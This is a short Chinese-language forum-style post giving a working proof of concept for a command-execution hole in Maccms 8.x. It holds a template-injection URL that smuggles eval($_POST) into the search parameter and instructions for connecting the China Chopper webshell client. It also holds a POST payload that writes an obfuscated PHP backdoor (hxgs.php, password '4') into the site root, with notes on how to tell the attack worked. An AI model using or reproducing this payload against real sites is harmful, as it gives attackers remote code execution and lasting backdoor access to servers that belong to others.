Maccms8.x 命令执行漏洞

Poc:

/index.php?m=vod-search&wd={{page:lang}if-A:e{page:lang}val{page:lang}($_PO{page:lang}ST[hxg])}{endif-A}

菜刀连接,密码:hxg


或者:

Post:

/index.php?m=vod-search&wd={{page:lang}if-A:e{page:lang}val{page:lang}($_PO{page:lang}ST[hxg])}{endif-A}


Post内容:
hxg=phpinfo().fputs(fopen('hxgs.php','w'),'<?php $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);?>');


显示phpinfo则成功,显示正常页面的换一下后面的马,成功后根目录生成hxgs.php,密码4


5.jpg

评论回复